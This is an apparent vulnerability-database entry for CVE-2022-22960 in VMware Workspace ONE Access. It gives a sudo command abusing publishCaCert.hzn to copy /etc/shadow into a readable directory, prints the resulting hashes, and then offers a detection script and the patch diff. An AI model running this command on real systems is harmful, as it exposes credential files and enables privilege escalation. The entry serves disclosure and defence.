Attacker Value
Low
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown

CVE-2022-22960

Exploited in the Wild

Description

VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to ‘root’.

Ratings
  • Attacker Value
    Low
  • Exploitability
    Very High
Technical Analysis

There exists a vulnerability within /usr/local/horizon/scripts/publishCaCert.hzn where a local attacker can invoke the script to copy any file into a world-readable location. The script is intended to facilitate certificate management, allowing cert files to be copied into /etc/ssl/certs, which is owned by root. The script can be invoked by the horizon user via sudo without a password.

The script takes two arguments: the first is the path of the file to copy, the second is the name of the file to write at the destination. The source path can be any file, but only the final path component of the destination argument is used, so the copy is always placed in /etc/ssl/certs.

A local user running as horizon (such as from successfully exploiting CVE-2022-22954) can exploit this vulnerability to recover the shadow file by executing:

horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow
root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7:::
bin:x:18964:0:60:7:::
daemon:x:18964:0:60:7:::
messagebus:x:18964:0:60:7:::
systemd-bus-proxy:x:18964:0:60:7:::
systemd-journal-gateway:x:18964:0:60:7:::
systemd-journal-remote:x:18964:0:60:7:::
systemd-journal-upload:x:18964:0:60:7:::
systemd-network:x:18964:0:60:7:::
systemd-resolve:x:18964:0:60:7:::
systemd-timesync:x:18964:0:60:7:::
nobody:x:18964:0:60:7:::
sshd:!:18964:0:60:7:::
rabbitmq:!:18964::60::::
named:!:18964::60::::
postgres:!:18964:0:60:7:::
horizon:!:18964:0:60:7:::
sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7:::
elasticsearch:!:18964::60::::

Detection

The file written to the /etc/ssl/certs directory is still owned by root, so the attacker cannot delete it. A crafty attacker would back up an existing certificate file or create a new one, leak the file of their choosing under that name, and then overwrite it again with a legitimate certificate to remove the evidence of the leaked file. Users should look for files that are out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.
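The detection advice above, as an added POSIX shell check that is not part of the original assessment or of VMware's scripts: it lists files under a certificate directory that lack PEM certificate markers (flagging passwd/shadow-like content) and files modified recently. The directory and the time window are assumptions, overridable via CERT_DIR and WINDOW_MIN.

```shell
#!/bin/sh
# Added defensive check for CVE-2022-22960 (not from the original assessment).
# Lists files in a certificate directory that carry no PEM certificate
# markers, and files modified recently, so a leaked copy of e.g. /etc/shadow
# written via publishCaCert.hzn stands out. Directory and window are assumptions.
CERT_DIR="${CERT_DIR:-/etc/ssl/certs}"   # directory the script writes into
WINDOW_MIN="${WINDOW_MIN:-1440}"         # look back 24h by default

# Return 0 when FILE contains both PEM certificate markers, 1 otherwise.
looks_like_pem_cert() {
    grep -q -- '-----BEGIN CERTIFICATE-----' "$1" &&
    grep -q -- '-----END CERTIFICATE-----' "$1"
}

# Return 0 when FILE looks like passwd/shadow content (has a root: entry),
# which is the kind of leak the assessment demonstrates.
looks_like_shadow() {
    grep -q '^root:' "$1"
}

# Print, one per line, regular files in DIR that fail the PEM check,
# marking those whose content looks like a leaked passwd/shadow file.
list_non_cert_files() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        if ! looks_like_pem_cert "$f"; then
            if looks_like_shadow "$f"; then
                printf '%s (passwd/shadow-like content)\n' "$f"
            else
                printf '%s\n' "$f"
            fi
        fi
    done
}

# Print regular files in DIR modified within the last MINUTES minutes;
# a freshly written copy has a recent mtime even if its name looks legitimate.
recent_files() {
    find "$1" -maxdepth 1 -type f -mmin "-$2"
}

if [ -d "$CERT_DIR" ]; then
    echo "== Non-certificate files in $CERT_DIR =="
    list_non_cert_files "$CERT_DIR"
    echo "== Files in $CERT_DIR modified in the last $WINDOW_MIN minutes =="
    recent_files "$CERT_DIR" "$WINDOW_MIN"
fi
```

A file that passes the PEM check but has an unexpected name or a fresh mtime still deserves a look, since an attacker can overwrite the leaked copy with a real certificate afterwards.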

Remediation

VMware patched this issue with hotfix HW-154129. The patch for the affected script adds validation to ensure that the source-file argument is a certificate file.

Diff:

< . /usr/local/horizon/scripts/hzn-bin.inc
< openssl x509 -noout -in $CERTFILE 2>/dev/null
< 
< if [ $? -ne 0 ]; then
<   echo "ERROR: This is not a certificate file"
<   exit 1
< fi
<
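Review bot: `$CERTFILE` is unquoted in `openssl x509 -noout -in $CERTFILE`, so a path containing whitespace or glob characters is word-split before openssl sees it; quote it as `"$CERTFILE"`, and the separate `$?` test can be folded into `if ! openssl x509 -noout -in "$CERTFILE" 2>/dev/null; then`. The check also only establishes that the source parses as an X.509 certificate; nothing in this hunk validates the destination-name argument, so a short comment stating what is and is not checked would help the next reader.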

General Information

Products

  • VMware Workspace ONE Access, Identity Manager and vRealize Automation
